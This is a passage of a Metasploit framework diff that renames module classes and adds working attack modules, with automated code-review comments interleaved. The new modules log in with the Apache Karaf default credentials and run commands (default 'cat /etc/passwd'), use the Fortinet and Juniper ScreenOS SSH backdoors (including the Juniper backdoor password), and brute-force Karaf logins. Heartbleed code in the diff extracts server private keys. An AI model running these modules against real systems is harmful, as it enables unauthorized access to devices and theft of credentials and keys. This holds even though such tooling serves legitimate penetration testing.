Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -16,8 +16,10 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'SNMP Community Scanner', - 'Description' => 'Scan for SNMP devices using common community names', + 'Name' => 'SNMP Community Login Scanner', + 'Description' => %q{ + This module logs in to SNMP devices using common community names. + }, 'Author' => 'hdm', 'References' => [ 
@@ -71,6 +73,14 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(credential_data) print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}" + report_service( + :host => ip, + :port => rport, + :proto => 'udp', + :name => 'snmp', + :info => result.proof, + :state => 'open' + ) else invalidate_login(credential_data) print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})" diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index edd07e2785..bf88ec862c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 445634756e..573424c908 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index c6cf8702bd..c9530ef9e9 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..0aaf08e0bd --- /dev/null +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb 
@@ -0,0 +1,133 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + 
::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 52becd24cc..f514ac63bb 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 1b1371675c..9d260001ec 100644 
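Review bot: In apache_karaf_command_execution.rb `run_host`, `output` is built with `.to_s`, so `if output` is always true and the `Command failed to execute` branch can never run; `unless output.empty?` (or dropping `.to_s` and testing for nil) makes the failure path reachable. The return value of `store_loot` is discarded and the next message prints the loot type string instead of a location; `path = store_loot(...)` followed by `vprint_status("#{ip}:#{rport} - Loot stored at: #{path}")` matches how openssl_heartbleed.rb reports it in this same diff. In `do_login`, the `Net::SSH::AuthenticationFailed` branch has no `return`, so a failed login prints both `Failed authentication` and `Unknown error`. The session returned by `do_login` is never closed; an `ensure` with `ssh.close` would release it.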
--- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb new file mode 100644 index 0000000000..4decb2fe61 --- /dev/null +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb 
@@ -0,0 +1,79 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Fortinet + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Fortinet SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Fortinet SSH backdoor. + }, + 'Author' => [ + 'operator8203 ', # PoC + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2016-1909'], + ['EDB', '39224'], + ['PACKETSTORM', '135225'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ], + 'DisclosureDate' => 'Jan 9 2016', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: rport, + auth_methods: ['fortinet-backdoor'] + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'Fortimanager_Access', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb new file mode 100644 index 0000000000..a0d0c38ced --- /dev/null +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb 
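Review bot: In fortinet_backdoor.rb `run_host`, `Net::SSH.start` is wrapped in `Timeout.timeout` but only `Net::SSH::Exception` is rescued, so a slow host raises `Timeout::Error` (and probably socket-level errors too) out of `run_host` instead of being logged and skipped. Widening the clause to `rescue Net::SSH::Exception, Timeout::Error => e`, plus whichever connection errors the transport raises, would keep per-host failures in the verbose log; apache_karaf_command_execution.rb in this diff already handles `::Timeout::Error` and `::EOFError` explicitly. juniper_backdoor.rb has the identical `begin`/`rescue` block and needs the same change. Neither module closes `ssh` after `report_vuln`, and neither passes `config: false` as the Karaf module does, so the operator's local SSH client configuration may be applied to the probe; this is worth confirming.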
@@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Juniper SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Juniper SSH backdoor (also valid on Telnet). + Any username is required, and the password is <<< %s(un='%s') = %u. + }, + 'Author' => [ + 'hdm', # Discovery + 'h00die ' # Module + ], + 'References' => [ + ['CVE', '2015-7755'], + ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'], + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] + ], + 'DisclosureDate' => 'Dec 20 2015', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: rport, + auth_methods: ['password', 'keyboard-interactive'], + password: %q{<<< %s(un='%s') = %u} + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'admin', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end 
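Review bot: In juniper_backdoor.rb, the username `'admin'` and the password literal are each written twice, once in the `Net::SSH.start` arguments or `ssh_opts` and again inside the `print_good` text, so the log line can drift from what was actually attempted; a module-level constant for each, interpolated into the message, would prevent that. The description sentence `Any username is required` reads ambiguously next to a hard-coded `'admin'`; something like "any username is accepted; this module uses admin" is presumably what is meant.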
diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb new file mode 100644 index 0000000000..723e085d0f --- /dev/null +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb 
@@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' +require 'metasploit/framework/login_scanner/ssh' +require 'metasploit/framework/credential_collection' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + DEFAULT_USERNAME = 'karaf' + DEFAULT_PASSWORD = 'karaf' + + def initialize + super( + 'Name' => 'Apache Karaf Login Utility', + 'Description' => %q{ + This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is + set, then it will also try the default 'karaf' credential. + }, + 'Author' => [ + 'Samuel Huckins', + 'Brent Cook', + 'Peer Aagaard', + 'Greg Mikeska', + 'Dev Mohanty' + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + # TODO Set default user, pass + Opt::RPORT(8101), + OptBool.new('TRYDEFAULTCRED', [true, 'Specify whether to try default creds', true]) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('STOP_ON_SUCCESS', [ false, '', true]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + def rport + datastore['RPORT'] + end + + def gather_proof + proof = '' + begin + Timeout.timeout(5) do + proof = ssh_socket.exec!("shell:info\n").to_s + end + rescue Timeout::Error + end + proof + end + + def run_host(ip) + @ip = ip + print_status("Attempting login to #{ip}:#{rport}...") + + cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], + password: datastore['PASSWORD'], + user_file: datastore['USER_FILE'], + userpass_file: 
datastore['USERPASS_FILE'], + username: datastore['USERNAME'], + user_as_pass: datastore['USER_AS_PASS'] + ) + + if datastore['TRYDEFAULTCRED'] + if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank? + cred_collection.add_public(DEFAULT_USERNAME) + cred_collection.add_private(DEFAULT_PASSWORD) + else + cred_collection.username = DEFAULT_USERNAME + cred_collection.password = DEFAULT_PASSWORD + end + end + + scanner = Metasploit::Framework::LoginScanner::SSH.new( + host: ip, + port: rport, + cred_details: cred_collection, + proxies: datastore['Proxies'], + stop_on_success: datastore['STOP_ON_SUCCESS'], + connection_timeout: datastore['SSH_TIMEOUT'], + framework: framework, + framework_module: self, + ) + + scanner.scan! do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'" + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + if /key length too short/i === result.proof.message + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof} (net/ssh out of date)" + else + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof}" + end + + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + invalidate_login(credential_data) + when Metasploit::Model::Login::Status::INCORRECT + vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? 
+ else + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 3379adad44..0b817c1c14 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 6a066ffef3..dffbe52e5e 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/ssh' require 'sshkey' # TODO: Actually include this! -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index e6925f9660..c804ba9b4c 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 2fd040823b..be4b190e3f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb 
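Review bot: In karaf_login.rb `run_host`, when TRYDEFAULTCRED is set (its default) and the operator supplied USERNAME or PASSWORD, the `else` branch assigns `cred_collection.username = DEFAULT_USERNAME` and `cred_collection.password = DEFAULT_PASSWORD`, which appears to replace the supplied pair rather than add the default alongside it as the description says. Calling `cred_collection.add_public(DEFAULT_USERNAME)` and `cred_collection.add_private(DEFAULT_PASSWORD)` in both cases would fit "also try", assuming those helpers append. `gather_proof` calls a bare `ssh_socket` that the visible module does not define (only `scanner.ssh_socket` appears), silently swallows `Timeout::Error`, and is never called. The SUCCESSFUL branch is the only one that leaves `scanner.ssh_socket` open, and `STOP_ON_SUCCESS` is registered with an empty description string.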
@@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 5371196d34..2f64059d2f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary resp = sock.get_once(-1, timeout) if ! resp - vprint_warning("#{peer} no response") + vprint_warning("No response") return end @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary info = "" if /^SSH-\d+\.\d+-(.*)$/ !~ ident - vprint_warning("#{peer} was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") + vprint_warning("Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") return end @@ -85,11 +85,11 @@ class Metasploit3 < Msf::Auxiliary end end - print_status("#{peer} SSH server version: #{ident}#{info}") + print_status("SSH server version: #{ident}#{info}") report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident) end rescue Timeout::Error - vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.") + vprint_warning("Timed out after #{timeout} seconds. Skipping.") ensure disconnect end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 69f1e4cfa4..9431875ba8 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -123,16 +123,16 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending CCS...") + vprint_status("Sending CCS...") sock.put(ccs) alert = sock.get_once(-1, response_timeout) if alert.blank? - print_good("#{peer} - No alert after invalid CCS message, probably vulnerable") + print_good("No alert after invalid CCS message, probably vulnerable") report elsif alert.unpack("C").first == ALERT_RECORD_TYPE - vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable") + vprint_error("Alert record as response to the invalid CCS Message, probably not vulnerable") elsif alert - vprint_warning("#{peer} - Unexpected response.") + vprint_warning("Unexpected response.") end end @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Auxiliary def establish_connect connect - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_hello = sock.get_once(-1, response_timeout) unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + vprint_error("No Server Hello after #{response_timeout} seconds...") disconnect return nil end unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 6d1a466b31..854d0e8969 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb 
@@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(ip) @check_only = true - vprint_status "#{peer} - Checking for Heartbleed exposure" + vprint_status "Checking for Heartbleed exposure" if bleed Exploit::CheckCode::Appears else @@ -339,13 +339,13 @@ class Metasploit3 < Msf::Auxiliary if jabber_host && jabber_host[1] disconnect establish_connect - vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") + vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = get_data end end if res.nil? || res.include?('stream:error') || res !~ / rhost, :port => rport, @@ -519,7 +519,7 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed server memory' ) - print_status("#{peer} - Heartbeat data stored in #{path}") + print_status("Heartbeat data stored in #{path}") end # Convert non-printable characters to periods @@ -536,7 +536,7 @@ class Metasploit3 < Msf::Auxiliary end # Show abbreviated data - vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}") + vprint_status("Printable info leaked:\n#{abbreviated_data}") end 
@@ -550,24 +550,24 @@ class Metasploit3 < Msf::Auxiliary disconnect return if connect_result.nil? - print_status("#{peer} - Scanning for private keys") + print_status("Scanning for private keys") count = 0 - print_status("#{peer} - Getting public key constants...") + print_status("Getting public key constants...") n, e = get_ne if n.nil? || e.nil? - print_error("#{peer} - Failed to get public key, aborting.") + print_error("Failed to get public key, aborting.") end - vprint_status("#{peer} - n: #{n}") - vprint_status("#{peer} - e: #{e}") - print_status("#{peer} - #{Time.now.getutc} - Starting.") + vprint_status("n: #{n}") + vprint_status("e: #{e}") + print_status("#{Time.now.getutc} - Starting.") max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys if count % status_every == 0 - print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") + print_status("#{Time.now.getutc} - Attempt #{count}...") end bleedresult = bleed @@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary unless p.nil? || q.nil? key = key_from_pqe(p, q, e) - print_good("#{peer} - #{Time.now.getutc} - Got the private key") + print_good("#{Time.now.getutc} - Got the private key") print_status(key.export) path = store_loot( @@ -588,18 +588,18 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed Private Key' ) - print_status("#{peer} - Private key stored in #{path}") + print_status("Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") + print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end # Returns the N and E params from the public server certificate def get_ne unless @cert - print_error("#{peer} - No certificate found") + print_error("No certificate found") return end 
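Review bot: The `n.nil? || e.nil?` branch in the `@@ -550,24 +550,24 @@` hunk prints "Failed to get public key, aborting." but does not return, so the method goes on to log `n` and `e` and enters the `max_keytries.times` loop with nil values. Add `return` after the `print_error` call, in line with the earlier `return if connect_result.nil?`. The method starts before this hunk and continues into the next two.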
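Review bot: `print_status(key.export)` in the `@@ -577,7 +577,7 @@` hunk writes the recovered private key to the console at normal verbosity, although the `store_loot` call right after it already persists the key. Console output tends to end up in spool files and terminal scrollback that are handled less carefully than loot. Changing the line to `vprint_status(key.export)`, or dropping it, would keep the key material in one controlled place.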
@@ -619,7 +619,7 @@ class Metasploit3 < Msf::Auxiliary # Only try candidates that have a chance... q, rem = n / can if rem == 0 && can != n - vprint_good("#{peer} - Found factor at offset #{x.to_s(16)}") + vprint_good("Found factor at offset #{x.to_s(16)}") p = can return p, q end @@ -692,7 +692,7 @@ class Metasploit3 < Msf::Auxiliary hdr = get_data(SSL_RECORD_HEADER_SIZE) unless hdr - vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...") + vprint_error("No SSL record header received after #{response_timeout} seconds...") return nil end @@ -700,7 +700,7 @@ class Metasploit3 < Msf::Auxiliary data = get_data(len) unless data - vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...") + vprint_error("No SSL record contents received after #{response_timeout} seconds...") return nil end diff --git a/modules/auxiliary/scanner/steam/server_info.rb b/modules/auxiliary/scanner/steam/server_info.rb index 398e0fb038..e82b1bc79f 100644 --- a/modules/auxiliary/scanner/steam/server_info.rb +++ b/modules/auxiliary/scanner/steam/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/steam' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Steam diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 18cd6912cc..8b07f815ee 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -34,7 +34,7 @@ class Object end end -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb index c5beadbe05..117ab45ab4 100644 
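Review bot: `q, rem = n / can` in the `@@ -619,7 +619,7 @@` hunk only works if `n` is a type whose `/` returns a quotient and remainder pair; with a plain Integer `rem` would be nil and the `rem == 0` test could never pass. Presumably `n` is an `OpenSSL::BN`, whose `/` returns both values, but that is set outside the hunk. A comment would save the next reader the lookup: `# n is an OpenSSL::BN: / returns [quotient, remainder]`.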
--- a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb +++ b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index 061b3b1c10..86c676b14e 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index b6af840661..116f8f6752 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb 